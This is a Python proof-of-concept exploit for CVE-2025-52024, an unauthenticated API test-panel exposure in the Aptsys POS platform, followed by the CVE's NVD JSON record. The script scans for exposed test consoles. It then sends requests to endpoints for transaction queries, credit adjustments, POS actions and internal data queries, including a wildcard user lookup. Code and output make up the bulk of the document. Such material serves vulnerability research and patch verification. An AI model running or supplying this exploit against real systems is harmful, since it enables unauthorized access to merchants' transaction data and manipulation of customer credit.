CVE-2025-52024

import requests import sys import re # CVE-2025-52024 PoC - Aptsys POS Platform Unauthorized API Access # Target: Aptsys POS Platform Web Services (versions before 2025-05-28) def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2025-52024 Tests for exposed API testing endpoints """ print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-52024 - Unauthenticated API Test Panel Access\n") # Common API test endpoint paths to test test_paths = [ "/api-test", "/api/test", "/debug/api", "/internal/api", "/services/api", "/admin/api-console", "/web-services/test", "/pos/api-test" ] headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" } vulnerable_endpoints = [] for path in test_paths: url = target_url.rstrip('/') + path try: response = requests.get(url, headers=headers, timeout=10, verify=False) if response.status_code == 200: # Check if response contains API test interface indicators content = response.text.lower() indicators = ['api', 'service', 'form', 'submit', 'test', 'endpoint'] matches = sum(1 for ind in indicators if ind in content) if matches >= 3: print(f"[+] VULNERABLE: {url}") print(f" Status: {response.status_code}") print(f" Content-Length: {len(response.text)}") vulnerable_endpoints.append(url) # Extract service list if available if 'service' in content or 'endpoint' in content: print(f" [+] API test interface detected - services may be enumerated") else: print(f"[-] Not vulnerable: {url}") else: print(f"[-] Endpoint not accessible: {url} (Status: {response.status_code})") except requests.exceptions.RequestException as e: print(f"[!] Error accessing {url}: {e}") if vulnerable_endpoints: print(f"\n[!] Target is VULNERABLE to CVE-2025-52024") print(f"[!] Found {len(vulnerable_endpoints)} exposed API test endpoints") print(f"[!] Attackers can access internal API functions without authentication") return True else: print(f"\n[-] Target appears NOT vulnerable") return False def exploit_api_endpoints(base_url, endpoint): """ Attempt to enumerate and interact with exposed API endpoints Note: This is for authorized security testing only """ print(f"\n[*] Enumerating API services at: {endpoint}") # Common API operations that could be exploited test_operations = [ ("/transactions/query", "POST", {"user_id": "*"}), ("/credit/adjust", "POST", {"amount": 0}), ("/pos/action", "POST", {"operation": "status"}), ("/internal/query", "GET", {}) ] for path, method, data in test_operations: url = base_url + path try: if method == "GET": resp = requests.get(url, timeout=10, verify=False) else: resp = requests.post(url, json=data, timeout=10, verify=False) if resp.status_code in [200, 201]: print(f"[+] API accessible: {path} - Status: {resp.status_code}") print(f" Response preview: {resp.text[:200]}...") except: pass if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-52024-poc.py <target_url>") print("Example: python cve-2025-52024-poc.py https://pos.example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

{"cve": {"id": "CVE-2025-52024", "sourceIdentifier": "[email protected]", "published": "2026-01-23T21:15:50.610", "lastModified": "2026-02-11T19:23:51.853", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability exists in the Aptsys POS Platform Web Services module thru 2025-05-28, which exposes internal API testing tools to unauthenticated users. By accessing specific URLs, an attacker is presented with a directory-style index listing all available backend services and POS web services, each with an HTML form for submitting test input. These panels are intended for developer use, but are accessible in production environments with no authentication or session validation. This grants any external actor the ability to discover, test, and execute API endpoints that perform critical functions including but not limited to user transaction retrieval, credit adjustments, POS actions, and internal data queries."}, {"lang": "es", "value": "Una vulnerabilidad existe en el módulo de servicios web de la plataforma Aptsys POS hasta el 28-05-2025, lo que expone herramientas internas de prueba de API a usuarios no autenticados. Al acceder a URL específicas, a un atacante se le presenta un índice estilo directorio que lista todos los servicios backend y servicios web POS disponibles, cada uno con un formulario HTML para enviar entradas de prueba. Estos paneles están destinados para uso de desarrolladores, pero son accesibles en entornos de producción sin autenticación ni validación de sesión. Esto otorga a cualquier actor externo la capacidad de descubrir, probar y ejecutar endpoints de API que realizan funciones críticas, incluyendo, entre otros, recuperación de transacciones de usuario, ajustes de crédito, acciones de POS y consultas de datos internas."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 5.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}, {"lang": "en", "value": "CWE-425"}, {"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aptsys:gemscms_backend:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025-05-28", "matchCriteriaId": "1F83E13A-9AF7-4E42-9849-9D9684967078"}]}]}], "references": [{"url": "http://aptsys.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://gist.github.com/ReverseThatApp/4a6be2b9b2ba39d38c35c8753e0afd39", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}